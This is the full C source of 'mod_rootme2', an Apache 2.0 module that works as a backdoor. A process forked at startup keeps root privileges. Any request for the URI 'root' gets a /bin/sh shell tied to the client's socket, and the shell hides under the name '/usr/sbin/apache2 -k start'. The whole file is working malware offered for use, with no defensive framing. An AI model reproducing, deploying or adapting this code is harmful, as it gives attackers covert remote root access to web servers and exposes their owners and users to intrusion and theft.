/*
 *  mod_rootme2 for Apache 2.0, version 0.2
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#define CORE_PRIVATE

#include "httpd.h"
#include "http_config.h"
#include "http_core.h"
#include "apr_arch_networkio.h"

#define MAX_SHELLS      64
#define HIDE_SHELL      "/usr/sbin/apache2 -k start"
#define ROOT_KEY        "root"

int pidlist[MAX_SHELLS];
int rd_pipe[MAX_SHELLS][2];
int wr_pipe[MAX_SHELLS][2];

static int rootme2_post_config( apr_pool_t *pconf, apr_pool_t *plog,
                                apr_pool_t *ptemp, server_rec *s )
{
    fd_set rfds;
    struct timeval tv;
    int i, n, pid, ppid;

    if( ttyname( 0 ) ) return( OK );

    /* create the necessary pipes and fork */

    for( i = 0; i < MAX_SHELLS; i++ )
    {
        pidlist[i] = 0;
        pipe( rd_pipe[i] );
        pipe( wr_pipe[i] );
    }

    if( fork() ) return( OK );

    ppid = getppid();

    while( 1 )
    {
        /* check if our father is still alive */

        if( getppid() != ppid ) exit( 0 );

        /* make sure there's no dead processes around */

        if( ( pid = waitpid( -1, NULL, WNOHANG ) ) > 0 )
        {
            for( i = 1; i < MAX_SHELLS; i++ )
            {
                if( pidlist[i] == pid )
                    pidlist[i] = 0;
            }
        }

        /* wait until a child wants root privileges */

        FD_ZERO( &rfds );
        FD_SET( rd_pipe[0][0], &rfds );

        tv.tv_sec  = 1;
        tv.tv_usec = 0;

        if( select( rd_pipe[0][0] + 1, &rfds, NULL, NULL, &tv ) < 0 )
            exit( 0 );

        if( FD_ISSET( rd_pipe[0][0], &rfds ) )
        {
            read( rd_pipe[0][0], &n, sizeof( n ) );

            if( n )
            {
                /* got a "kill the shell" request */

                if( pidlist[n] )
                {
                    kill( pidlist[n], 9 );
                    pidlist[n] = 0;
                }

                continue;
            }

            /* got a "spawn rootshell" request */

            for( i = 1; i < MAX_SHELLS; i++ )
                if( pidlist[i] == 0 ) break;

            write( wr_pipe[0][1], &i, sizeof( i ) );

            if( i == MAX_SHELLS ) continue;

            if( ! ( pid = fork() ) )
            {
                setsid();
                close( 0 );
                close( 1 );
                close( 2 );
                dup2( rd_pipe[i][0], 0 );
                dup2( wr_pipe[i][1], 1 );
                dup2( wr_pipe[i][1], 2 );
                execlp( "/bin/sh", HIDE_SHELL, 0 );
                exit( 1 );
            }

            pidlist[i] = pid;
        }
    }

    /* not reached */

    return( OK );
}

static int rootme2_post_read_request( request_rec *r )
{
    fd_set rfds;
    int client, n, x;
    char buffer[1024];
    apr_socket_t *client_socket;

    /* check the uri first */

    if( strcmp( r->uri, ROOT_KEY ) )
        return( DECLINED );

    /* ask the master process for a rootshell */

    x = 0;
    n = write( rd_pipe[0][1], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    n = read( wr_pipe[0][0], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    if( x == MAX_SHELLS )
        exit( 0 );

    client_socket = ap_get_module_config(
        r->connection->conn_config, &core_module);

    client = client_socket->socketdes;

    /* tranfer the data between client and rootshell */

    while( 1 )
    {
        FD_ZERO( &rfds );
        FD_SET( wr_pipe[x][0], &rfds );
        FD_SET( client, &rfds );

        n = ( wr_pipe[x][0] > client )
            ? wr_pipe[x][0] : client;

        if( select( n + 1, &rfds, NULL, NULL, NULL ) < 0 )
            exit( 0 );

        if( FD_ISSET( wr_pipe[x][0], &rfds ) )
        {
            if( ( n = read( wr_pipe[x][0], buffer, 1024 ) ) <= 0 )
                break;

            if( send( client, buffer, n, 0 ) != n )
                break;
        }

        if( FD_ISSET( client, &rfds ) )
        {
            if( ( n = recv( client, buffer, 1024, 0 ) ) <= 0 )
                break;

            if( write( rd_pipe[x][1], buffer, n ) != n )
                break;
        }
    }

    /* tell the master process to kill the shell */

    write( rd_pipe[0][1], &x, sizeof( x ) );

    exit( 0 );

    /* not reached */

    return( DONE );
}

static void rootme2_register_hooks( apr_pool_t *p )
{
    ap_hook_post_config( rootme2_post_config, NULL, NULL, APR_HOOK_FIRST );

    ap_hook_post_read_request( rootme2_post_read_request, NULL, NULL,
                               APR_HOOK_FIRST );
}

module AP_MODULE_DECLARE_DATA rootme2_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    rootme2_register_hooks
};

